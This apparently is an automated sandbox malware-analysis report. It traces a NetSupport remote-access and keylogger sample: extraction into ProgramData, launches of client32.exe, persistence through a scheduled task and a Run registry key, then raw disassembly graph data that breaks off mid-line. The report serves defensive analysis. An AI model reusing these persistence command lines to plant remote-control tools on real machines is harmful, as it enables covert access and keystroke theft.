                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:17:37:10
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\
                                                                                                                                  Imagebase:0x7ff627730000
                                                                                                                                  File size:273'920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:17:37:10
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\timeout.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:TIMEOUT /T 3
                                                                                                                                  Imagebase:0x7ff61e320000
                                                                                                                                  File size:30'720 bytes
                                                                                                                                  MD5 hash:EB9A65078396FB5D4E3813BB9198CB18
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:13
                                                                                                                                  Start time:17:37:10
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\ProgramData\7zz.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:587'776 bytes
                                                                                                                                  MD5 hash:42BADC1D2F03A8B1E4875740D3D49336
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 0%, ReversingLabs

                                                                                                                                  General

                                                                                                                                  Target ID:14
                                                                                                                                  Start time:17:37:13
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:SCHTASKS /create /F /tn "KAVAQQQ" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 4 /sd 01/01/2022 /st 00:00
                                                                                                                                  Imagebase:0x7ff7ebae0000
                                                                                                                                  File size:226'816 bytes
                                                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:15
                                                                                                                                  Start time:17:37:13
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd /c C:\ProgramData\client32.exe
                                                                                                                                  Imagebase:0x7ff627730000
                                                                                                                                  File size:273'920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:16
                                                                                                                                  Start time:17:37:13
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\ProgramData\client32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\ProgramData\client32.exe
                                                                                                                                  Imagebase:0x11e0000
                                                                                                                                  File size:101'680 bytes
                                                                                                                                  MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000010.00000000.406057046.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000010.00000002.654634382.000000000350F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000010.00000002.654210424.0000000001735000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000010.00000002.654634382.0000000003521000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000010.00000002.654110401.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\client32.exe, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 11%, ReversingLabs

                                                                                                                                  General

                                                                                                                                  Target ID:17
                                                                                                                                  Start time:17:37:13
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                                                                                                                  Imagebase:0x7ff7b4610000
                                                                                                                                  File size:72'704 bytes
                                                                                                                                  MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:18
                                                                                                                                  Start time:17:37:13
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "KAVAS" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                                                                                                                  Imagebase:0x7ff7b4610000
                                                                                                                                  File size:72'704 bytes
                                                                                                                                  MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:19
                                                                                                                                  Start time:17:37:15
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd.exe /c C:\ProgramData\client32.exe
                                                                                                                                  Imagebase:0x7ff627730000
                                                                                                                                  File size:273'920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:20
                                                                                                                                  Start time:17:37:15
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7fcd70000
                                                                                                                                  File size:625'664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Target ID:21
                                                                                                                                  Start time:17:37:15
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\ProgramData\client32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\ProgramData\client32.exe
                                                                                                                                  Imagebase:0x11e0000
                                                                                                                                  File size:101'680 bytes
                                                                                                                                  MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.411812182.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000000.410473552.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security

                                                                                                                                  General

                                                                                                                                  Target ID:24
                                                                                                                                  Start time:17:37:25
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\ProgramData\client32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\ProgramData\client32.exe"
                                                                                                                                  Imagebase:0x11e0000
                                                                                                                                  File size:101'680 bytes
                                                                                                                                  MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000018.00000000.431953663.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000018.00000002.433418912.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security

                                                                                                                                  General

                                                                                                                                  Target ID:25
                                                                                                                                  Start time:17:37:33
                                                                                                                                  Start date:18/07/2023
                                                                                                                                  Path:C:\ProgramData\client32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\ProgramData\client32.exe"
                                                                                                                                  Imagebase:0x11e0000
                                                                                                                                  File size:101'680 bytes
                                                                                                                                  MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000000.449712542.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000002.450737079.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:5.7%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:12.5%
                                                                                                                                    Total number of Nodes:1913
                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                    execution_graph 36271 46e717 36280 46e7bc 36271->36280 36274 46e728 GetCurrentProcess TerminateProcess 36277 46e739 36274->36277 36275 46e7a3 36283 46e7c5 LeaveCriticalSection ctype 36275->36283 36276 46e7aa ExitProcess 36277->36275 36277->36276 36279 46e7a8 36284 46e56a 36280->36284 36282 46e71d 36282->36274 36282->36277 36283->36279 36285 46e5c0 EnterCriticalSection 36284->36285 36286 46e582 36284->36286 36285->36282 36287 46e598 36286->36287 36297 46d03c 7 API calls ctype 36286->36297 36289 46e56a ctype 9 API calls 36287->36289 36290 46e5a0 36289->36290 36291 46e5a7 InitializeCriticalSection 36290->36291 36292 46e5b1 36290->36292 36294 46e5b6 36291->36294 36298 46c0ff 36292->36298 36311 46e5cb LeaveCriticalSection 36294->36311 36296 46e5be 36296->36285 36297->36287 36299 46c12d 36298->36299 36300 46c1d9 36298->36300 36301 46c137 36299->36301 36302 46c172 36299->36302 36300->36294 36303 46e56a ctype 10 API calls 36301->36303 36304 46c163 36302->36304 36306 46e56a ctype 10 API calls 36302->36306 36308 46c13e 36303->36308 36304->36300 36305 46c1cb RtlFreeHeap 36304->36305 36305->36300 36307 46c17e 36306->36307 36313 46c1c1 LeaveCriticalSection ctype 36307->36313 36312 46c169 LeaveCriticalSection ctype 36308->36312 36311->36296 36312->36304 36313->36304 36314 46bfd7 36315 46c000 36314->36315 36317 46bfde 36314->36317 36317->36315 36318 46c003 36317->36318 36319 46c030 36318->36319 36322 46c073 36318->36322 36320 46e56a ctype 11 API calls 36319->36320 36329 46c05e 36319->36329 36323 46c046 36320->36323 36321 46c0e2 RtlAllocateHeap 36324 46c065 36321->36324 36325 46e56a ctype 11 API calls 36322->36325 36322->36329 36330 46c06a LeaveCriticalSection ctype 36323->36330 36324->36317 36327 46c09c 36325->36327 36331 46c0c9 LeaveCriticalSection ctype 36327->36331 36329->36321 36329->36324 36330->36329 36331->36329 36332 427386 36333 4273a4 36332->36333 36334 427393 36332->36334 36334->36333 36336 407a18 36334->36336 36337 46c0ff ctype 11 API calls 36336->36337 36338 407a21 36337->36338 36338->36333 36339 40d875 36340 40d882 36339->36340 36341 40d893 36339->36341 36340->36341 36345 40d89a __EH_prolog 36340->36345 36344 407a18 ctype 11 API calls 36344->36341 36348 4585e0 36345->36348 36349 4585e4 VirtualFree 36348->36349 36350 40d88d 36348->36350 36349->36350 36350->36344 36351 4585b0 36352 46c0ff ctype 11 API calls 36351->36352 36353 4585b6 36352->36353 36354 46cf4c GetVersion 36381 46ea66 HeapCreate 36354->36381 36356 46cfaa 36357 46cfb7 36356->36357 36358 46cfaf 36356->36358 36386 46e31c 36357->36386 36450 46d061 8 API calls ctype 36358->36450 36361 46cfbc 36363 46cfc0 36361->36363 36364 46cfc8 36361->36364 36451 46d061 8 API calls ctype 36363->36451 36394 46fcd7 36364->36394 36368 46cfd1 GetCommandLineA 36405 470ad6 36368->36405 36372 46cfeb 36431 4707d0 36372->36431 36374 46cff0 36441 405c72 __EH_prolog 36374->36441 36378 46d01d 36453 470658 13 API calls 36378->36453 36380 46d02e 36382 46eabc 36381->36382 36383 46ea86 36381->36383 36382->36356 36384 46eabf 36383->36384 36385 46eab0 HeapDestroy 36383->36385 36384->36356 36385->36382 36454 46e541 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 36386->36454 36388 46e322 TlsAlloc 36389 46e332 36388->36389 36390 46e36c 36388->36390 36389->36390 36391 46e343 TlsSetValue 36389->36391 36390->36361 36391->36390 36392 46e354 36391->36392 36393 46e35a GetCurrentThreadId 36392->36393 36393->36361 36395 46fcea 36394->36395 36396 46fcf8 GetStartupInfoA 36395->36396 36455 46d03c 7 API calls ctype 36395->36455 36399 46fd46 36396->36399 36400 46fe17 36396->36400 36399->36400 36404 46fddf GetFileType 36399->36404 36401 46fe82 SetHandleCount 36400->36401 36402 46fe42 GetStdHandle 36400->36402 36401->36368 36402->36400 36403 46fe50 GetFileType 36402->36403 36403->36400 36404->36399 36406 470b24 36405->36406 36407 470af1 GetEnvironmentStringsW 36405->36407 36409 470af9 36406->36409 36410 470b15 36406->36410 36408 470b05 GetEnvironmentStrings 36407->36408 36407->36409 36408->36410 36411 46cfe1 36408->36411 36412 470b31 GetEnvironmentStringsW 36409->36412 36413 470b3d WideCharToMultiByte 36409->36413 36410->36411 36414 470bb7 GetEnvironmentStrings 36410->36414 36415 470bc3 36410->36415 36424 470889 36411->36424 36412->36411 36412->36413 36417 470ba3 FreeEnvironmentStringsW 36413->36417 36418 470b71 36413->36418 36414->36411 36414->36415 36422 470bf4 FreeEnvironmentStringsA 36415->36422 36417->36411 36418->36417 36419 470b80 WideCharToMultiByte 36418->36419 36420 470b91 36419->36420 36421 470b9a 36419->36421 36423 46c0ff ctype 11 API calls 36420->36423 36421->36417 36422->36411 36423->36421 36425 4708a0 GetModuleFileNameA 36424->36425 36426 47089b 36424->36426 36428 4708c3 36425->36428 36456 471c08 30 API calls 36426->36456 36430 4708f4 36428->36430 36457 46d03c 7 API calls ctype 36428->36457 36430->36372 36432 4707dd 36431->36432 36434 4707e2 36431->36434 36458 471c08 30 API calls 36432->36458 36439 470823 ctype 36434->36439 36459 46d03c 7 API calls ctype 36434->36459 36436 46c0ff ctype 11 API calls 36437 470872 36436->36437 36437->36374 36438 470866 36438->36436 36439->36438 36460 46d03c 7 API calls ctype 36439->36460 36461 405f22 GetVersionExA 36441->36461 36445 405ca1 36465 403a70 __EH_prolog SetFileApisToOEM 36445->36465 36447 405cae 36611 401917 SetConsoleCtrlHandler 36447->36611 36449 405f11 36452 46e6f5 14 API calls 36449->36452 36452->36378 36453->36380 36454->36388 36455->36396 36456->36425 36457->36430 36458->36434 36459->36439 36460->36439 36462 405c94 36461->36462 36463 4018a2 SetConsoleCtrlHandler 36462->36463 36464 4018c0 36463->36464 36464->36445 36613 405b9f 36465->36613 36467 403a91 GetCommandLineW 36468 403aad 36467->36468 36469 407a18 ctype 11 API calls 36468->36469 36470 403ac8 36469->36470 36471 403acf 36470->36471 36614 404c12 __EH_prolog 36470->36614 36473 40862d ctype 13 API calls 36471->36473 36475 403f72 36473->36475 36477 408604 ctype 13 API calls 36475->36477 36479 403f7e 36477->36479 36478 403b0c 36480 403b62 36478->36480 36483 403b2c 36478->36483 36479->36447 36481 403b6b 36480->36481 36485 403b77 36480->36485 36792 458600 GetModuleHandleA GetProcAddress 36481->36792 36791 405233 15 API calls ctype 36483->36791 36484 403b70 36484->36485 36631 41035d __EH_prolog 36485->36631 36488 403bb1 36695 41741c __EH_prolog 36488->36695 36490 403bf3 36495 403ecc 36490->36495 36567 403c9b 36490->36567 36491 403ffc 36492 404017 36491->36492 36500 404572 36491->36500 36493 4049d4 36492->36493 36494 404024 36492->36494 36820 40279e 192 API calls ctype 36493->36820 36510 404037 36494->36510 36610 404500 36494->36610 36495->36491 36496 403f85 36495->36496 36800 401679 34 API calls ctype 36495->36800 36802 4012bb 51 API calls 36496->36802 36499 40458c 36702 401e26 36499->36702 36500->36499 36816 4053ad 11 API calls 36500->36816 36502 403f9b 36502->36491 36508 403fa8 36502->36508 36502->36610 36504 403f0b 36504->36496 36509 403f18 36504->36509 36504->36610 36505 404abf 36505->36447 36507 408604 ctype 13 API calls 36517 404513 36507->36517 36512 408604 ctype 13 API calls 36508->36512 36514 408604 ctype 13 API calls 36509->36514 36516 401e26 11 API calls 36510->36516 36511 4045c2 36515 401e26 11 API calls 36511->36515 36531 403fc0 36512->36531 36513 404a22 36522 408604 ctype 13 API calls 36513->36522 36513->36610 36527 403f30 36514->36527 36519 40460f 36515->36519 36520 4040a4 36516->36520 36815 405233 15 API calls ctype 36517->36815 36518 403e63 36793 408604 36518->36793 36706 404b67 36519->36706 36804 40502a 11 API calls 36520->36804 36537 404a64 36522->36537 36526 40453f 36530 40862d ctype 13 API calls 36526->36530 36801 405233 15 API calls ctype 36527->36801 36528 40461a 36540 401e26 11 API calls 36528->36540 36529 4040af 36541 401e26 11 API calls 36529->36541 36533 404555 36530->36533 36803 405233 15 API calls ctype 36531->36803 36535 408604 ctype 13 API calls 36533->36535 36535->36479 36536 403fe9 36542 40862d ctype 13 API calls 36536->36542 36821 405233 15 API calls ctype 36537->36821 36539 403e8b 36799 405233 15 API calls ctype 36539->36799 36544 40466f 36540->36544 36545 4040fb 36541->36545 36546 404aa3 36542->36546 36709 40862d 36544->36709 36805 405172 13 API calls ctype 36545->36805 36549 408604 ctype 13 API calls 36546->36549 36549->36610 36551 404113 36806 404baf 12 API calls 36551->36806 36553 401e9a 11 API calls 36553->36567 36556 40411e 36807 419b56 14 API calls ctype 36556->36807 36559 404139 36561 40413d 36559->36561 36808 419fde 194 API calls ctype 36561->36808 36564 401e9a 11 API calls 36575 404298 36564->36575 36565 407a18 ctype 11 API calls 36565->36567 36566 4046fa 36581 4048d7 36566->36581 36609 40477f 36566->36609 36567->36518 36567->36553 36567->36565 36569 404489 36813 4050d8 17 API calls ctype 36569->36813 36571 404498 36573 407a18 ctype 11 API calls 36571->36573 36577 4044a3 36573->36577 36574 407a18 ctype 11 API calls 36578 40495f 36574->36578 36598 40432c 36575->36598 36810 404b09 19 API calls ctype 36575->36810 36576 404313 36584 407a18 ctype 11 API calls 36576->36584 36579 408604 ctype 13 API calls 36577->36579 36818 405489 14 API calls ctype 36578->36818 36586 4044b0 36579->36586 36581->36574 36582 40496f 36583 407a18 ctype 11 API calls 36582->36583 36585 40497a 36583->36585 36584->36598 36588 408604 ctype 13 API calls 36585->36588 36814 405233 15 API calls ctype 36586->36814 36596 404995 36588->36596 36591 4044d9 36592 40862d ctype 13 API calls 36591->36592 36594 4044ef 36592->36594 36593 404221 36593->36564 36593->36598 36597 408604 ctype 13 API calls 36594->36597 36595 40417c 36595->36593 36602 407a18 ctype 11 API calls 36595->36602 36809 404b09 19 API calls ctype 36595->36809 36819 405233 15 API calls ctype 36596->36819 36600 4044fb 36597->36600 36601 404372 36598->36601 36603 407a18 ctype 11 API calls 36598->36603 36811 404b09 19 API calls ctype 36598->36811 36600->36479 36812 4054de 11 API calls ctype 36601->36812 36602->36595 36603->36598 36604 407a18 ctype 11 API calls 36605 4048a4 36604->36605 36817 405489 14 API calls ctype 36605->36817 36607 4048b4 36608 407a18 ctype 11 API calls 36607->36608 36608->36610 36609->36604 36610->36505 36610->36507 36612 401932 36611->36612 36612->36449 36613->36467 36615 404c37 36614->36615 36616 401e9a 11 API calls 36615->36616 36617 404c54 36616->36617 36618 401e9a 11 API calls 36617->36618 36619 404c69 36618->36619 36620 401e9a 11 API calls 36619->36620 36621 404c7e 36620->36621 36822 404d09 __EH_prolog 36621->36822 36624 401e9a 11 API calls 36625 404ce0 36624->36625 36626 401e9a 11 API calls 36625->36626 36627 403b00 36626->36627 36628 40fec3 36627->36628 36849 406d26 __EH_prolog 36628->36849 36630 40fecd 36630->36478 36632 41037a 36631->36632 36851 410a4c __EH_prolog 36632->36851 36636 41038f 36859 41191e __EH_prolog 36636->36859 36637 41191e 12 API calls 36638 410422 36637->36638 36640 410459 36638->36640 36921 410ca4 35 API calls ctype 36638->36921 36644 410485 36640->36644 36922 410ca4 35 API calls ctype 36640->36922 36642 4104f7 36863 410b06 __EH_prolog 36642->36863 36644->36642 36645 401e26 11 API calls 36644->36645 36645->36642 36646 41051c 36647 401e26 11 API calls 36646->36647 36649 410552 36646->36649 36647->36649 36648 410587 36650 41075b 36648->36650 36659 410591 36648->36659 36649->36648 36651 401e26 11 API calls 36649->36651 36652 41076b 36650->36652 36668 4108ae 36650->36668 36651->36648 36929 41124b 21 API calls ctype 36652->36929 36654 41077c 36930 4117bd 14 API calls ctype 36654->36930 36655 410756 36657 40925b 22 API calls 36655->36657 36658 410a28 36657->36658 36658->36488 36662 4105ed 36659->36662 36923 410ca4 35 API calls ctype 36659->36923 36661 410618 36663 41062d 36661->36663 36925 410ac9 25 API calls 36661->36925 36662->36661 36924 410ca4 35 API calls ctype 36662->36924 36873 411046 36663->36873 36668->36655 36681 407a18 11 API calls ctype 36668->36681 36689 401e26 11 API calls 36668->36689 36671 410684 36881 41003e __EH_prolog 36671->36881 36673 4108a1 36678 411046 28 API calls 36673->36678 36674 410786 36675 410801 36674->36675 36677 401e26 11 API calls 36674->36677 36675->36673 36683 401e26 11 API calls 36675->36683 36676 410643 36926 406796 12 API calls 36676->36926 36677->36675 36678->36655 36679 40862d ctype 13 API calls 36684 41074a 36679->36684 36681->36668 36683->36673 36686 408604 ctype 13 API calls 36684->36686 36685 410669 36927 406796 12 API calls 36685->36927 36686->36655 36688 410675 36691 407a18 ctype 11 API calls 36688->36691 36689->36668 36690 4106a7 36693 401e26 11 API calls 36690->36693 36694 4106f6 36690->36694 36692 410681 36691->36692 36692->36694 36928 4117bd 14 API calls ctype 36692->36928 36693->36694 36694->36679 36696 40862d ctype 13 API calls 36695->36696 36697 417435 36696->36697 36701 4174d6 36697->36701 37107 40fa26 36697->37107 37111 4177f2 __EH_prolog 36697->37111 37115 405aaf __EH_prolog 36697->37115 36701->36490 36703 401e32 36702->36703 36705 401e44 36702->36705 36704 401e9a 11 API calls 36703->36704 36704->36705 36705->36511 36707 401e9a 11 API calls 36706->36707 36708 404b93 36707->36708 36708->36528 37124 408642 36709->37124 36712 405bba 36713 40867e 11 API calls 36712->36713 36714 405bd2 36713->36714 36715 4046a4 36714->36715 37151 405bf3 12 API calls 36714->37151 36717 401e9a 36715->36717 36718 401eaa 36717->36718 36719 401eda 36717->36719 36718->36719 36720 407a18 ctype 11 API calls 36718->36720 36721 415d31 __EH_prolog 36719->36721 36720->36719 36725 415d82 36721->36725 36722 415e28 36727 415e45 36722->36727 37261 41669f 12 API calls 36722->37261 36724 40b431 20 API calls 36724->36725 36725->36722 36725->36724 36726 407a18 ctype 11 API calls 36725->36726 36725->36727 36726->36725 36730 415eec 36727->36730 36789 415f10 36727->36789 36728 4163df 36729 408604 ctype 13 API calls 36728->36729 36731 415f08 36729->36731 36733 408604 ctype 13 API calls 36730->36733 36731->36566 36732 40b431 20 API calls 36732->36789 36733->36731 36734 41668a 36735 41646b 36736 407a18 ctype 11 API calls 36735->36736 36787 416473 36736->36787 36737 408604 ctype 13 API calls 36737->36731 36738 40862d ctype 13 API calls 36738->36789 36740 416489 36741 408604 ctype 13 API calls 36740->36741 36742 416495 36741->36742 36743 407a18 ctype 11 API calls 36742->36743 36743->36787 36744 4164c4 36745 408604 ctype 13 API calls 36744->36745 36746 4164d0 36745->36746 36748 407a18 ctype 11 API calls 36746->36748 36747 408604 ctype 13 API calls 36747->36789 36748->36787 36749 401e9a 11 API calls 36749->36789 36750 4164fd 36751 408604 ctype 13 API calls 36750->36751 36754 416509 36751->36754 36752 401e26 11 API calls 36752->36789 36753 416536 36756 407a18 ctype 11 API calls 36753->36756 36759 407a18 ctype 11 API calls 36754->36759 36755 407a18 11 API calls ctype 36755->36789 36757 41653e 36756->36757 36758 408604 ctype 13 API calls 36757->36758 36760 41654b 36758->36760 36759->36787 36766 407a18 ctype 11 API calls 36760->36766 36761 416578 36763 407a18 ctype 11 API calls 36761->36763 36764 416580 36763->36764 36769 408604 ctype 13 API calls 36764->36769 36765 4165ba 36768 407a18 ctype 11 API calls 36765->36768 36766->36787 36767 